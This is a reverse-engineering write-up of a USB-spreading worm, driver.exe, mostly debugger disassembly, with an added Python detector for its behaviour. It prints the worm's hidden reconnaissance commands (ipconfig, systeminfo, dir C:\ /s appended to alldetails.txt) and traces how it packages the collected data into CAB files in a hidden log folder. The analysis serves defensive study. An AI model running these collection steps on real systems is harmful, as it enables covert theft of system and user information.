Driver.exe Analysis

MD5 = 894DF4FA5D934A9382ACFC20CB057F4D

Abstract : The sample is a worm whose primary infection vector is removable drives. Its payloads include autostart preparation entries; enumeration and logging of user and system information; .cab file creation to back up the collected data, ostensibly for transfer; and exploit documents dropped from embedded encrypted code. These document files in turn download further malware to the infected system. This particular variant requires command-line arguments, indicating that it is launched by another triggering agent.

Static and Dynamic analysis : The sections below depict the flow of control in the malware code.

1. Selection of command-line arguments : passing ‘-e’ triggers most of the “execution”

00407F8F 9>NOP

00407F90 /$ 5>PUSH ECX

00407F91 |. 8>LEA EAX,DWORD PTR SS:[ESP]

00407F95 |. 5>PUSH ESI

00407F96 |. 5>PUSH EAX ; /pArgc

00407F97 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetCommandLine>; |[GetCommandLineW

Generic str cmp :

00407FE6 |. E>CALL driver.00413E5E ; STR CMP

Code for -e argument comparison :

00408014 |. 6>PUSH driver.004255DC ; UNICODE “-e”

00408019 |. 5>PUSH ECX

0040801A |. E>CALL driver.00413E5E : STR CMP with cmd args -e

; cdecl func

0040801F |. 8>ADD ESP,8 ; 2 arguments

00408022 |. 8>TEST EAX,EAX ; if eax==0 the compare succeeded (strings match)

00408024 |. 7>JNZ SHORT driver.0040805C ; falls through to the call below if the zero flag is set

00408026 |. E>CALL driver.0040C1F0

2. An Explorer window (the Explore.exe process) is started via ShellExecuteA with the “explore” verb on the drive root, and a mutex named ‘fuwa’ is created; if GetLastError returns 0B7 (ERROR_ALREADY_EXISTS) the routine returns 0 immediately.

0040C1F0 /$ 8>SUB ESP,56C

0040C1F6 |. 5>PUSH EBP

0040C1F7 |. 8>LEA EAX,DWORD PTR SS:[ESP+368]

0040C1FE |. 6>PUSH 104 ; /BufSize = 104 (260.)

0040C203 |. 5>PUSH EAX ; |PathBuffer

0040C204 |. 6>PUSH 0 ; |hModule = NULL

0040C206 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileN>; \GetModuleFileNameA

0040C20C |. 8>MOV CL,BYTE PTR SS:[ESP+368]

0040C213 |. 8>MOV DL,BYTE PTR SS:[ESP+369]

0040C21A |. 6>PUSH 5 ; /IsShown = 5

0040C21C |. 6>PUSH 0 ; |DefDir = NULL

0040C21E |. 8>LEA EAX,DWORD PTR SS:[ESP+C] ; |

0040C222 |. 6>PUSH 0 ; |Parameters = NULL

0040C224 |. 5>PUSH EAX ; |FileName

0040C225 |. 6>PUSH driver.00426360 ; |Operation = “explore”

0040C22A |. 6>PUSH 0 ; |hWnd = NULL

0040C22C |. 8>MOV BYTE PTR SS:[ESP+1C],CL ; |

0040C230 |. 8>MOV BYTE PTR SS:[ESP+1D],DL ; |

0040C234 |. C>MOV BYTE PTR SS:[ESP+1E],0 ; |

0040C239 |. F>CALL DWORD PTR DS:[<&SHELL32.ShellExecuteA>] ; \ShellExecuteA

0040C23F |. 6>PUSH driver.004262E8 ; /MutexName = “fuwa”

0040C244 |. 6>PUSH 1 ; |InitialOwner = TRUE

0040C246 |. 6>PUSH 0 ; |pSecurity = NULL

0040C248 |. F>CALL DWORD PTR DS:[<&KERNEL32.CreateMutexA>] ; \CreateMutexA

0040C24E |. 8>MOV EBP,EAX

0040C250 |. F>CALL DWORD PTR DS:[<&KERNEL32.GetLastError>] ; [GetLastError

0040C256 |. 3>CMP EAX,0B7

0040C25B |. 7>JNZ SHORT driver.0040C267

0040C25D |. 3>XOR EAX,EAX

0040C25F |. 5>POP EBP

0040C260 |. 8>ADD ESP,56C

0040C266 |. C>RETN

Stack View :

0012F9> 00000000 |hWnd = NULL

0012F9> 00426360 |Operation = “explore”

0012F9> 0012F9C0 |FileName = “C:”

0012F9> 00000000 |Parameters = NULL

0012F9> 00000000 |DefDir = NULL

0012F9> 00000005 \IsShown = 5

3. Code unreachable by static control flow is located at 0040A800. At runtime this address is used as the start routine of a thread created suspended (CREATE_SUSPENDED) and then resumed, so that particular malcode executes.

Creates a thread from the unreachable section :

0040BE95 . 6A 04 PUSH 4 ; |CreationFlags = CREATE_SUSPENDED

0040BE97 . 53 PUSH EBX ; |pThreadParm

0040BE98 . 68 00A84000 PUSH svchost.0040A800 ; |ThreadFunction = svchost.0040A800

0040BE9D . 53 PUSH EBX ; |StackSize

Creates a new thread taking code from this address :

0040A800 . 55 PUSH EBP

0040A801 . 8BEC MOV EBP,ESP

0040A803 . 6A FF PUSH -1

0040A805 . 68 A0FE4100 PUSH svchost.0041FEA0 ; SE handler installation

0040A80A . 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]

0040A810 . 50 PUSH EAX

0040A811 . 64:8925 000000>MOV DWORD PTR FS:[0],ESP

0040A818 . 51 PUSH ECX

0040A819 . 53 PUSH EBX

0040A81A . 56 PUSH ESI

0040A81B . 57 PUSH EDI

0040A81C . 8965 F0 MOV DWORD PTR SS:[EBP-10],ESP

0040A81F . 33F6 XOR ESI,ESI

0040A821 > 8975 FC MOV DWORD PTR SS:[EBP-4],ESI

0040A824 . 3935 20A74200 CMP DWORD PTR DS:[42A720],ESI

0040A82A . 75 46 JNZ SHORT svchost.0040A872

0040A82C . C705 20A74200 >MOV DWORD PTR DS:[42A720],1

0040A836 . E8 D5450000 CALL svchost.0040EE10

0040A83B . 8935 20A74200 MOV DWORD PTR DS:[42A720],ESI

0040A841 . 68 E0930400 PUSH 493E0 ; /Timeout = 300000. ms

0040A846 . FF15 54104200 CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep

0040A84C . C745 FC FFFFFF>MOV DWORD PTR SS:[EBP-4],-1

0040A853 .^EB CC JMP SHORT svchost.0040A821

0040A855 . C705 20A74200 >MOV DWORD PTR DS:[42A720],0

0040A85F . 68 60EA0000 PUSH 0EA60 ; /Timeout = 60000. ms

0040A864 . FF15 54104200 CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep

0040A86A . B8 70A84000 MOV EAX,svchost.0040A870

0040A86F . C3 RETN

0040A870 . 33F6 XOR ESI,ESI

0040A872 > C745 FC FFFFFF>MOV DWORD PTR SS:[EBP-4],-1

0040A879 .^EB A6 JMP SHORT svchost.0040A821


4. We get to :

0040EEBC |. 8D8C24 C801000>LEA ECX,DWORD PTR SS:[ESP+1C8]

0040EEC3 |. 50 PUSH EAX ; /pTotalNumberOfFreeBytes

0040EEC4 |. 8D9424 D401000>LEA EDX,DWORD PTR SS:[ESP+1D4] ; |

0040EECB |. 51 PUSH ECX ; |pTotalNumberOfBytes

0040EECC |. 8D4424 64 LEA EAX,DWORD PTR SS:[ESP+64] ; |

0040EED0 |. 52 PUSH EDX ; |pFreeBytesAvailableToCaller

0040EED1 |. 50 PUSH EAX ; |DirectoryName

0040EED2 |. C64424 54 00 MOV BYTE PTR SS:[ESP+54],0 ; |

0040EED7 |. 66:896C24 55 MOV WORD PTR SS:[ESP+55],BP ; |

0040EEDC |. 89AC24 8000000>MOV DWORD PTR SS:[ESP+80],EBP ; |

0040EEE3 |. 896C24 74 MOV DWORD PTR SS:[ESP+74],EBP ; |

0040EEE7 |. C78424 8C00000>MOV DWORD PTR SS:[ESP+8C],104 ; |

0040EEF2 |. FF15 40104200 CALL DWORD PTR DS:[<&KERNEL32.GetDiskFre>; \GetDiskFreeSpaceExA

Stack :

009BF850 009BF8BC |DirectoryName = “C:\”

009BF854 009BFA30 |pFreeBytesAvailableToCaller = 009BFA30

009BF858 009BFA28 |pTotalNumberOfBytes = 009BFA28

009BF85C 009BF8F0 \pTotalNumberOfFreeBytes = 009BF8F0

Further, the code below is self-explanatory –

0040EFBE |. 68 10A34200 PUSH svchost.0042A310 ; ASCII “C:\WINDOWS\log”

0040EFC3 |. E8 5E500000 CALL svchost.00414026

0040EFC8 |. 83C4 08 ADD ESP,8

0040EFCB |. 83F8 FF CMP EAX,-1

0040EFCE |. 75 19 JNZ SHORT svchost.0040EFE9

0040EFD0 |. 55 PUSH EBP ; /pSecurity

0040EFD1 |. 68 10A34200 PUSH svchost.0042A310 ; |Path = “C:\WINDOWS\log”

0040EFD6 |. FF15 3C104200 CALL DWORD PTR DS:[<&KERNEL32.CreateDire>; \CreateDirectoryA

0040EFDC |. 6A 06 PUSH 6 ; /FileAttributes = HIDDEN|SYSTEM

0040EFDE |. 68 10A34200 PUSH svchost.0042A310 ; |FileName = “C:\WINDOWS\log”

0040EFE3 |. FF15 E4104200 CALL DWORD PTR DS:[<&KERNEL32.SetFileAtt>; \SetFileAttributesA

0040EFE9 |> 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]

0040EFED |. 51 PUSH ECX ; /pLocaltime

0040EFEE |. FF15 48104200 CALL DWORD PTR DS:[<&KERNEL32.GetLocalTi>; \GetLocalTime

0040EFF4 |. 8D5424 74 LEA EDX,DWORD PTR SS:[ESP+74]

0040EFF8 |. 8D4424 10 LEA EAX,DWORD PTR SS:[ESP+10]

0040EFFC |. 52 PUSH EDX ; /pFileTime

0040EFFD |. 50 PUSH EAX ; |pSystemTime

0040EFFE |. FF15 4C104200 CALL DWORD PTR DS:[<&KERNEL32.SystemTime>; \SystemTimeToFileTime

0040F004 |. B9 41000000 MOV ECX,41

0040F009 |. 33C0 XOR EAX,EAX

0040F00B |. 8DBC24 A800000>LEA EDI,DWORD PTR SS:[ESP+A8]

0040F012 |. 8D9424 A800000>LEA EDX,DWORD PTR SS:[ESP+A8]

0040F019 |. F3:AB REP STOS DWORD PTR ES:[EDI]

0040F01B |. 8B4C24 10 MOV ECX,DWORD PTR SS:[ESP+10]

0040F01F |. 81E1 FFFF0000 AND ECX,0FFFF

0040F025 |. 51 PUSH ECX

0040F026 |. 68 10A34200 PUSH svchost.0042A310 ; ASCII “C:\WINDOWS\log”

0040F02B |. 68 FC654200 PUSH svchost.004265FC ; ASCII “%s\%d”

0040F030 |. 52 PUSH EDX

5. Cab file preparation begins in this region :

0040F163 |. 68 E0654200 PUSH svchost.004265E0 ; ASCII “%s%d.cab”

0040F168 |. EB 13 JMP SHORT svchost.0040F17D

0040F16A |> 25 FFFF0000 AND EAX,0FFFF

0040F16F |. 8D8C24 A800000>LEA ECX,DWORD PTR SS:[ESP+A8]

0040F176 |. 50 PUSH EAX

0040F177 |. 51 PUSH ECX

0040F178 |. 68 D4654200 PUSH svchost.004265D4 ; ASCII “%s0%d.cab”

0040F17D |> 8D9424 B400000>LEA EDX,DWORD PTR SS:[ESP+B4]

0040F184 |. 52 PUSH EDX

0040F185 |. E8 16410000 CALL svchost.004132A0

0040F18A |. B9 41000000 MOV ECX,41

0040F18F |. 33C0 XOR EAX,EAX

0040F191 |. 8DBC24 2402000>LEA EDI,DWORD PTR SS:[ESP+224]

0040F198 |. 83C4 10 ADD ESP,10

0040F19B |. F3:AB REP STOS DWORD PTR ES:[EDI]

0040F19D |. 8D8424 1402000>LEA EAX,DWORD PTR SS:[ESP+214]

0040F1A4 |. 50 PUSH EAX ; /Buffer

009BC040 DC BF 9B 00 00 00 00 00 Ü¿›…..

009BC048 74 C8 9B 00 74 68 25 7D tÈ›.th%}

009BC050 38 34 22 7D FF FF FF FF 84″}ÿÿÿÿ

009BC058 F0 47 23 7D DC 25 23 7D ðG#}Ü%#}

009BC060 F0 C0 9B 00 D0 52 15 00 ðÀ›.ÐR.

009BC068 00 00 00 00 34 00 00 C0 ….4..À

009BC070 A0 C0 9B 00 6C FB 90 7C  À›.lû|

009BC078 71 FB 90 7C 34 00 00 C0 qû|4..À

009BC080 00 00 00 00 D0 52 15 00 ….ÐR.

009BC088 7C C0 9B 00 00 00 00 00 |À›…..

009BC090 74 C8 9B 00 18 EE 90 7C tÈ›.î|

009BC098 34 00 00 C0 02 00 00 00 4..À…

009BC0A0 B0 C0 9B 00 92 93 80 7C °À›.’“€|

009BC0A8 02 00 00 00 00 00 00 00 …….

009BC0B0 1C C1 9B 00 A7 B6 80 7C Á›.§¶€|

009BC0B8 34 00 00 C0 64 C4 9B 00 4..ÀdÄ›.

009BC0C0 D2 D5 FA 7F 0A 00 00 00 ÒÕú….

009BC0C8 14 C1 9B 00 F8 EB FD 7F Á›.øëý

009BC0D0 00 00 00 00 FC C0 9B 00 ….üÀ›.

009BC0D8 AA F0 90 7C 00 EC FD 7F ªð|.ìý

009BC0E0 62 00 00 00 08 C1 9B 00 b…Á›.

009BC0E8 60 C3 9B 00 31 00 00 00 `Û.1…

009BC0F0 18 00 00 00 00 00 00 00 …….

009BC0F8 14 C1 9B 00 40 00 00 00 Á›.@…

for :

004018DA |. 2BF9 SUB EDI,ECX

004018DC |. 897424 10 MOV DWORD PTR SS:[ESP+10],ESI

004018E0 |. 8BC1 MOV EAX,ECX

004018E2 |. 8BF7 MOV ESI,EDI

009BC038 34 00 00 C0 00 00 00 00 4..À….

009BC040 32 30 31 31 31 31 31 38 20111118

009BC048 31 33 35 35 31 35 2E 63 135515.c

009BC050 38 34 22 7D FF FF FF FF 84″}ÿÿÿÿ

009BC058 F0 47 23 7D DC 25 ðG#}Ü%

Copies the cab file name.

Tracing further, we get to the dump at the first FCICreate API call :


ERROR structure (ERF) in memory :

009BF320 1C F1 9B 00 00 00 00 00 ñ›…..

009BF328 AC F3 9B 00 43 3A 5C 57 ¬ó›.C:\W

009BF330 49 4E 44 4F 57 53 5C 6C INDOWS\l

009BF338 6F 67 5C 00 BC F3 9B 00 og\.¼ó›.

009BF340 A2 D8 96 7C 08 06 14 00 ¢Ø–|.

009BF348 86 D8 96 7C 00 00 14 00 †Ø–|…

009BF350 00 00 00 00 00 00 14 00 …….

009BF358 92 00 00 00 5C 00 44 00 ’…\.D.

009BF360 65 00 76 00 69 00 63 00 e.v.i.c.

009BF368 65 00 5C 00 48 00 61 00 e.\.H.a.

009BF370 72 00 64 00 64 00 69 00 r.d.d.i.

009BF378 73 00 6B 00 56 00 6F 00 s.k.V.o.

009BF380 6C 00 75 00 68 33 14 00 l.u.h3.

009BF388 48 31 14 00 28 02 00 00 H1.(..

009BF390 00 00 14 00 62 00 6F 00 …b.o.

Parameters to FCI CREATE :

009BF2D4 009BF320

009BF2D8 004016B0 driver.004016B0

009BF2DC 004015F0 driver.004015F0

009BF2E0 00401600 driver.00401600

009BF2E4 00401610 driver.00401610

009BF2E8 00401630 driver.00401630

009BF2EC 00401650 driver.00401650

009BF2F0 00401670 driver.00401670

009BF2F4 00401680 driver.00401680

009BF2F8 004016A0 driver.004016A0

009BF2FC 004016C0 driver.004016C0

009BF300 009BF430

FCICreate returns a non-null value (see screenshot) :

NEXT at 40F1FE:

0040F1F8 |. 5>PUSH EDX ; /Arg1

0040F1F9 |. E>CALL driver.00401840 ; \ FCI CREATE

0040F1FE |. 6>PUSH driver.00425CBC ; ASCII “ab+”

0040F203 |. 6>PUSH driver.0042A518 ; ASCII “C:\WINDOWS\drive.ini”

0040F208 |. E>CALL driver.00414013

0040F20D |. 8>MOV EDI,EAX

6. We get to the cmd /c routines, which the analyst patched at runtime to keep the session within time constraints.

CALL TO cmd /c payloads :

0040F426 |. 5>PUSH EDX ; /pFileTime

0040F427 |. 5>PUSH EAX ; |pSystemTime

0040F428 |. F>CALL DWORD PTR DS:[<&KERNEL32.SystemTi>; \SystemTimeToFileTime

0040F42E |. 8>LEA ECX,DWORD PTR SS:[ESP+214]

0040F435 |. 5>PUSH ECX

0040F436 |. E>CALL driver.0040EBC0 ; call cmd /c function

0040F43B |. 8>LEA EDX,DWORD PTR SS:[ESP+218]

0040F442 |. 5>PUSH EBP

0040F443 |. 5>PUSH EDX

0040EC18 |. 5>PUSH EDX ; /pProcessInfo

0040EC19 |. 8>MOV DWORD PTR SS:[ESP+1C],ECX ; |

0040EC1D |. 5>PUSH EAX ; |pStartupInfo

0040EC1E |. 8>MOV EBP,DWORD PTR DS:[<&KERNEL32.Creat>; |kernel32.CreateProcessA

0040EC24 |. 5>PUSH EBX ; |CurrentDir

0040EC25 |. 8>MOV DWORD PTR SS:[ESP+28],ECX ; |

0040EC29 |. 5>PUSH EBX ; |pEnvironment

0040EC2A |. 6>PUSH 20 ; |CreationFlags = NORMAL_PRIORITY_CLASS

0040EC2C |. 8>MOV DWORD PTR SS:[ESP+34],ECX ; |

0040EC30 |. 5>PUSH EBX ; |InheritHandles

0040EC31 |. 5>PUSH EBX ; |pThreadSecurity

0040EC32 |. 8>LEA ECX,DWORD PTR SS:[ESP+84] ; |

0040EC39 |. 5>PUSH EBX ; |pProcessSecurity

0040EC3A |. 5>PUSH ECX ; |CommandLine

0040EC3B |. 5>PUSH EBX ; |ModuleFileName

0040EC3C |. C>MOV DWORD PTR SS:[ESP+4C],44 ; |

0040EC44 |. C>MOV DWORD PTR SS:[ESP+78],1 ; |

0040EC4C |. 6>MOV WORD PTR SS:[ESP+7C],BX ; |

0040EC51 |. F>CALL EBP ; \CreateProcessA

009BF6C4 00000000

009BF6C8 009BF754 ASCII “cmd /c ipconfig /all >> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alldetails.txt”

009BF6CC 00000000

009BF6D0 00000000

TO CHECK LATER :

0040EC79 |. 5>PUSH EAX

0040EC7A |. E>CALL driver.004132A0

009BF6E0 009BF754 ASCII “cmd /c systeminfo >> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alldetails.txt”

009BF6DC 009BF754 ASCII “cmd /c dir C:\ /s >> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alldetails.txt”

Edited to save time :

009BF6C8 009BF754 ASCII “cmd /c ver C:\ /s >> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alldetails.txt”

009BF6CC 00000000

0040EDCF |. C>MOV DWORD PTR SS:[ESP+4C],44

0040EDD7 |. C>MOV DWORD PTR SS:[ESP+78],1

0040EDDF |. F>CALL EBP ; kernel32.CreateProcessA ; calls above edited sequence

eax modified so that the loop finishes at the Z: drive, to save scanning time : eax = 0000005A

0040EDE5 |. 6>PUSH -1

0040EDE7 |. 5>PUSH ECX

0040EDE8 |. F>CALL EBX

0040EDEA |. 8>MOV AL,BYTE PTR SS:[ESP+10]

0040EDEE |. F>INC AL

0040EDF0 |. 3>CMP AL,5A

0040EDF2 |. 8>MOV BYTE PTR SS:[ESP+10],AL

0040EDF6 |.^0>JL driver.0040ED6D

The above code iterates through the drive letters from the root drive up to Z: (the letter held in [ESP+10] is incremented and compared against 5A, ‘Z’).
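To turn the cmd /c enumeration above into a detection, here is an added Python example (not code from the original analysis). It parses constructed process-creation records in an assumed pipe-separated format and flags a parent process that launches two or more reconnaissance commands whose output is appended to the same file, which is exactly the alldetails.txt pattern visible in the stack dumps above.

```python
import re
from collections import defaultdict

# Reconnaissance commands this sample launches through cmd /c (from the stack dumps above).
RECON_COMMANDS = {"ipconfig", "systeminfo", "dir", "ver"}

# cmd /c <command> [args] >> <output file>
CMD_REDIRECT = re.compile(
    r"^cmd(?:\.exe)?\s+/c\s+(?P<cmd>\S+)(?P<args>.*?)\s*>>\s*(?P<out>\S+)\s*$",
    re.IGNORECASE,
)

# Constructed sample records: timestamp|parent pid|image|command line (assumed format).
SAMPLE_LOG = [
    "2011-11-18T13:55:15|1234|C:\\WINDOWS\\system32\\cmd.exe|cmd /c ipconfig /all >> C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\alldetails.txt",
    "2011-11-18T13:55:16|1234|C:\\WINDOWS\\system32\\cmd.exe|cmd /c systeminfo >> C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\alldetails.txt",
    "2011-11-18T13:55:17|1234|C:\\WINDOWS\\system32\\cmd.exe|cmd /c dir C:\\ /s >> C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\alldetails.txt",
    "2011-11-18T13:55:18|4321|C:\\WINDOWS\\system32\\cmd.exe|cmd /c dir C:\\build >> C:\\build\\listing.txt",
    "2011-11-18T13:55:19|5555|C:\\WINDOWS\\notepad.exe|notepad.exe C:\\notes.txt",
]


def parse_line(line):
    """Split one pipe-separated record into its fields."""
    ts, ppid, image, cmdline = line.rstrip("\n").split("|", 3)
    return {"ts": ts, "ppid": int(ppid), "image": image, "cmdline": cmdline}


def classify(event):
    """Return (command, output file) when the event is a recon command redirected to a file, else None."""
    m = CMD_REDIRECT.match(event["cmdline"])
    if not m:
        return None
    cmd = m.group("cmd").lower()
    if cmd not in RECON_COMMANDS:
        return None
    return cmd, m.group("out").lower()


def find_recon_chains(lines, min_commands=2):
    """Group recon commands by (parent pid, output file) and keep groups of min_commands or more.

    A single 'dir >> file' is everyday admin activity; several different enumeration
    commands from one parent feeding one file is the worm's collection step.
    """
    chains = defaultdict(list)
    for line in lines:
        event = parse_line(line)
        hit = classify(event)
        if hit:
            cmd, out = hit
            chains[(event["ppid"], out)].append(cmd)
    return {key: cmds for key, cmds in chains.items() if len(cmds) >= min_commands}


if __name__ == "__main__":
    for (ppid, out), cmds in find_recon_chains(SAMPLE_LOG).items():
        print("parent %d wrote %s via: %s" % (ppid, out, ", ".join(cmds)))
```

Grouping on the parent pid and the redirect target rather than on the individual commands is what keeps the single benign `dir` from parent 4321 out of the result while the three commands from parent 1234 are reported together.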

Once alldetails.txt has been populated by the enumeration, it is fed through the following function :

0040F45B |. 8>LEA ECX,DWORD PTR SS:[ESP+54]

0040F45F |. 5>PUSH EAX ; /Arg1 = 009BFA74 ASCII “C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alldetails.txt”

0040F460 |. E>CALL driver.00401A20 ; \CAB CALL !!!!!

0040F465 |. 8>LEA ECX,DWORD PTR SS:[ESP+54]


Cab files are created after the above call. In further sessions a breakpoint can be placed here if cab file creation is to be observed, saving time.

00401AF2 |. 5>PUSH EAX

00401AF3 |. E>CALL <JMP.&CABINET.FCIFlushCabinet>

00401AF8 |. 8>ADD ESP,10

00401AFB |. 8>TEST EAX,EAX

00401AFD |. 7>JNZ SHORT driver.00401B0F

00401AFF |. 8>MOV ECX,DWORD PTR DS:[ESI+4]

00401B02 |. 5>PUSH ECX

00401B03 |. E>CALL <JMP.&CABINET.FCIDestroy>

00401B08 |. 8>ADD ESP,4

00401B0B |. 3>XOR EAX,EAX

00401B0D |. 5>POP ESI

00401B0E |. C>RETN

00401B0F |> 8>MOV EDX,DWORD PTR DS:[ESI+4]

00401B12 |. 5>PUSH EDX

00401B13 |. E>CALL <JMP.&CABINET.FCIDestroy>

00401B18 |. 8>ADD ESP,4

00401B1B |. 5>POP ESI ; kernel32.WritePrivateProfileStringA

00401B1C \. C>RETN

At this point a working cab file is created in the filesystem.

7. We move to the .bak function, which handles the .bak files :

0040DC40 /$ 6>MOV EAX,DWORD PTR FS:[0]

0040DC46 |. 6>PUSH -1

0040DC48 |. 8>MOV EDX,DWORD PTR SS:[ESP+8]

0040DC4C |. 6>PUSH driver.0042014B

0040DC51 |. 5>PUSH EAX

0040DC52 |. 6>MOV DWORD PTR FS:[0],ESP

0040DC59 |. 8>SUB ESP,268

0040DC5F |. 8>CMP EDX,driver.0042A2AC

0040DC65 |. 5>PUSH EBX

0040DC66 |. 5>PUSH EBP

0040DC67 |. 5>PUSH ESI

0040DC68 |. 5>PUSH EDI

0040DC69 |. 7>JNZ SHORT driver.0040DC72

0040DC6B |. 3>XOR EAX,EAX

0040DC6D |. E>JMP driver.0040DE0D

0040DC72 |> B>MOV ECX,40

0040DC77 |. 3>XOR EAX,EAX

0040DC79 |. 8>LEA EDI,DWORD PTR SS:[ESP+49]

0040DC7D |. C>MOV BYTE PTR SS:[ESP+48],0

0040DC82 |. F>REP STOS DWORD PTR ES:[EDI]

0040DC84 |. 6>STOS WORD PTR ES:[EDI]

0040DC86 |. 6>PUSH driver.00425CC4 ; ASCII “rb”

0040DC8B |. 5>PUSH EDX

0040DC8C |. A>STOS BYTE PTR ES:[EDI]

0040DC8D |. E>CALL driver.00414013

0040DC92 |. 8>MOV ESI,EAX

0040DC94 |. 8>ADD ESP,8

0040DC97 |. 8>TEST ESI,ESI

0040DC99 |. 0>JE driver.0040DE0D

0040DC9F |. 6>PUSH 2

0040DCA1 |. 6>PUSH 0

0040DCA3 |. 5>PUSH ESI

0040DCA4 |. E>CALL driver.0041406A

0040DCA9 |. 5>PUSH ESI

0040DCAA |. E>CALL driver.004142F8

0040DCAF |. 6>PUSH 0

0040DCB1 |. 6>PUSH 0

0040DCB3 |. 5>PUSH ESI

0040DCB4 |. 8>MOV EBP,EAX

0040DCB6 |. E>CALL driver.0041406A

0040DCBB |. 8>MOV EAX,EBP

0040DCBD |. 8>MOV EBX,EBP

0040DCBF |. 9>CDQ

0040DCC0 |. 8>AND EDX,0F

0040DCC3 |. 0>ADD EAX,EDX

0040DCC5 |. 8>MOV EDI,EAX

0040DCC7 |. C>SAR EDI,4

0040DCCA |. 8>AND EBX,8000000F

0040DCD0 |. 7>JNS SHORT driver.0040DCD7

0040DCD2 |. 4>DEC EBX

0040DCD3 |. 8>OR EBX,FFFFFFF0

0040DCD6 |. 4>INC EBX

0040DCD7 |> 8>MOV EAX,DWORD PTR SS:[ESP+2A4]

0040DCDE |. 8>LEA ECX,DWORD PTR SS:[ESP+64]

0040DCE2 |. 5>PUSH EAX

0040DCE3 |. 6>PUSH driver.004265C4 ; ASCII “%s.bak”

0040DCE8 |. 5>PUSH ECX

0040DCE9 |. E>CALL driver.004132A0

0040DCEE |. 8>LEA EDX,DWORD PTR SS:[ESP+70]

0040DCF2 |. 6>PUSH 0

0040DCF4 |. 5>PUSH EDX

0040DCF5 |. E>CALL driver.00414026

0040DCFA |. 8>ADD ESP,30

0040DCFD |. 8>TEST EAX,EAX

0040DCFF |. 7>JNZ SHORT driver.0040DD0C

0040DD01 |. 8>LEA EAX,DWORD PTR SS:[ESP+48]

0040DD05 |. 5>PUSH EAX ; /FileName

0040DD06 |. F>CALL DWORD PTR DS:[<&KERNEL32.DeleteFileA>] ; \DeleteFileA

0040DD0C |> 8>LEA ECX,DWORD PTR SS:[ESP+48]

0040DD10 |. 6>PUSH driver.004265C0 ; ASCII “wb”

0040DD15 |. 5>PUSH ECX

0040DD16 |. E>CALL driver.00414013

0040DD1B |. 8>MOV EBP,EAX

0040DD1D |. 8>ADD ESP,8

0040DD20 |. 8>TEST EBP,EBP

0040DD22 |. 7>JNZ SHORT driver.0040DD34

0040DD24 |. 5>PUSH ESI

0040DD25 |. E>CALL driver.00413E93

0040DD2A |. 8>ADD ESP,4

0040DD2D |. 3>XOR EAX,EAX

0040DD2F |. E>JMP driver.0040DE0D

0040DD34 |> 6>PUSH driver.004265AC

0040DD39 |. 6>PUSH 10

0040DD3B |. 8>LEA ECX,DWORD PTR SS:[ESP+154]

0040DD42 |. E>CALL driver.00401010

0040DD47 |. 8>TEST EDI,EDI

0040DD49 |. C>MOV DWORD PTR SS:[ESP+280],0

0040DD54 |. 7>JLE SHORT driver.0040DD93

0040DD56 |> 5>/PUSH ESI

0040DD57 |. 6>|PUSH 10

0040DD59 |. 8>|LEA EDX,DWORD PTR SS:[ESP+18]

0040DD5D |. 6>|PUSH 1

0040DD5F |. 5>|PUSH EDX

0040DD60 |. E>|CALL driver.0041414D

0040DD65 |. 8>|ADD ESP,10

0040DD68 |. 8>|LEA EAX,DWORD PTR SS:[ESP+2C]

0040DD6C |. 8>|LEA ECX,DWORD PTR SS:[ESP+10]

0040DD70 |. 5>|PUSH EAX

0040DD71 |. 5>|PUSH ECX

0040DD72 |. 8>|LEA ECX,DWORD PTR SS:[ESP+154]

0040DD79 |. E>|CALL driver.00401250

0040DD7E |. 5>|PUSH EBP

0040DD7F |. 6>|PUSH 10

0040DD81 |. 8>|LEA EDX,DWORD PTR SS:[ESP+34]

0040DD85 |. 6>|PUSH 1

0040DD87 |. 5>|PUSH EDX

0040DD88 |. E>|CALL driver.00413EE9

0040DD8D |. 8>|ADD ESP,10

0040DD90 |. 4>|DEC EDI

0040DD91 |.^7>\JNZ SHORT driver.0040DD56

0040DD93 |> 8>TEST EBX,EBX

0040DD95 |. 7>JE SHORT driver.0040DDE2

0040DD97 |. 3>XOR EAX,EAX

0040DD99 |. 5>PUSH ESI

0040DD9A |. 8>MOV DWORD PTR SS:[ESP+14],EAX

0040DD9E |. 5>PUSH EBX

0040DD9F |. 8>MOV DWORD PTR SS:[ESP+1C],EAX

0040DDA3 |. 8>LEA ECX,DWORD PTR SS:[ESP+18]

0040DDA7 |. 8>MOV DWORD PTR SS:[ESP+20],EAX

0040DDAB |. 6>PUSH 1

0040DDAD |. 5>PUSH ECX

0040DDAE |. 8>MOV DWORD PTR SS:[ESP+2C],EAX

0040DDB2 |. E>CALL driver.0041414D

0040DDB7 |. 8>ADD ESP,10

0040DDBA |. 8>LEA EDX,DWORD PTR SS:[ESP+2C]

0040DDBE |. 8>LEA EAX,DWORD PTR SS:[ESP+10]

0040DDC2 |. 8>LEA ECX,DWORD PTR SS:[ESP+14C]

0040DDC9 |. 5>PUSH EDX

0040DDCA |. 5>PUSH EAX

0040DDCB |. E>CALL driver.00401250

0040DDD0 |. 5>PUSH EBP

0040DDD1 |. 6>PUSH 10

0040DDD3 |. 8>LEA ECX,DWORD PTR SS:[ESP+34]

0040DDD7 |. 6>PUSH 1

0040DDD9 |. 5>PUSH ECX

0040DDDA |. E>CALL driver.00413EE9

0040DDDF |. 8>ADD ESP,10

0040DDE2 |> 5>PUSH ESI

0040DDE3 |. E>CALL driver.00413E93

0040DDE8 |. 5>PUSH EBP

0040DDE9 |. E>CALL driver.00413E93

0040DDEE |. 8>ADD ESP,8

0040DDF1 |. 8>LEA ECX,DWORD PTR SS:[ESP+14C]

0040DDF8 |. C>MOV DWORD PTR SS:[ESP+280],-1

0040DE03 |. E>CALL driver.00401000

0040DE08 |. B>MOV EAX,1

0040DE0D |> 8>MOV ECX,DWORD PTR SS:[ESP+278]

0040DE14 |. 5>POP EDI

0040DE15 |. 5>POP ESI

0040DE16 |. 5>POP EBP
